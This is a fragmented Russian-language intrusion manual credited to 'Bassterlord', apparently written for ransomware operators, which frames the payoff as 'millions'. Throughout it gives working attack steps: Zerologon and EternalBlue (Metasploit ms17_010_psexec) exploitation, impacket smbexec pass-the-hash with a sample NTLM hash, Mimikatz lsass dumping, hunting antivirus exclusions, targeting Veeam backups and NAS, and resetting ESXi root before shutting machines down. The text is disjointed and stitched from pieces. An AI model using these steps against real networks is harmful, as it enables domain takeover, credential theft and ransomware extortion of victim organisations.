от Bassterlord (FishEye)
Предисловие
4. Любая винда 10
5. Nmap ТЫЦ
6. Мимик ТЫЦ
7. GMER ТЫЦ
9. Pysecdump ТЫЦ
15. Блюкип эксплоит для 3389 под виндовс (лежит рядом в архиве)
Далее вводим
cd impacket
Вводим команды
cd c:\impacket
cve-2020-1472-exploit.py
http://masscan.online/ru
Заходим в кали
cd Fortigate
Это и будет наш материал для работы копируем наш валид на виртуалку с
виндой и смотрим следующий раздел.
RANSOMWARE = Терроризм
Все ваши действия которые вы будете
выполнять далее вы делаете на свой страх и
риск.
Однако данный риск приносит миллионы!
Я не пропагандирую рансом это просто ман по
пентесту.
Начало работы
Первым делом мы заходим в нашу виртуалку под виндовс
10.102.96.0 — 255.255.255.0
10.102.96.0 — 10.102.96.255
10.102.0.0 — 255.255.0.0
10.102.0.0 — 10.102.255.255
Если мы видим
0.0.0.0 — 0.0.0.0
192.168.0.0 — 192.168.255.255
интеграция с нмап
Ставим галочку на етернал и запускаем сканирование
Общие:135,137,139,445,8080,80,443
Oracle: 1521,1522
Nfs: 111,1039,1047,1048,2049
Iscsi: 860,3260
replication: 902,31031,8123,8043,5480,5722
use exploit/windows/smb/ms17_010_psexec
exploit
set SessionCommunicationTimeout 0
exploit
getsystem
load kiwi
Тогда можно
shell
net group
cd impacket/examples
Жмем enter нас попросит ввести пароль вводим в слепую kali и жмем enter
Возвращаемся в кали.
вводим cd impacket/examples
sudo python3 smbexec.py -hashes
aad3b435b51404eeaad3b435b51404ee:48b3420f6a0f7ae1fb29104b213154ee
Administrator@192.168.16.27
либо
support Pa$$wo0rd
Далее заходим DC и снимаем креды домен админов мимиком 64.exe или 32.exe
Gmer
PowerTool
переходим по пути:
Компьютер\HKEY_LOCAL_MACHINE\SOFTWARE
Если находим смотрим все подпапки которые есть в папке с ав наша цель
найти папки и значения внутри них с названием Exclusions (исключения)
С:\users\admin\java.exe
5000,5001
а бекапы
Veeam: 9443,9392,9393,9401,6160
Обычно насы висят вне домена первым делом смотрим скан если у нас
появился доступ к ним из обычного скана с учетками домен админа все
супер.
Однако если насы в воркгруппе можно пробить всех домен админов и
попробовать залогинится в них по кредам без домена с пробитых учеток
через веб интерефейс открыв айпи наса через браузер и указав порт наса
через двоеточие.
вводим логин домен админа без домена и его пароль. теперь все готово для
авторизации, заходим в esx хост используя креды доменного админа и
сбрасываем root пасс
Выключаешь машины
Первым делом она поможет нам запустить любой файл на всех тачках к
которым у нас есть доступ.
и procdump.exe
Итак мы вошли в тачку делаем
cd C:\
pysecdump.exe -s
Далее делаем
sekurlsa::minidump lsass.dmp
privilege::debug
log 1234.txt
sekurlsa::logonPasswords full
Не всегда срабатывает!
и прописать следующее:
Создаем прослушиватель.
Там же делаем
Дальше идем в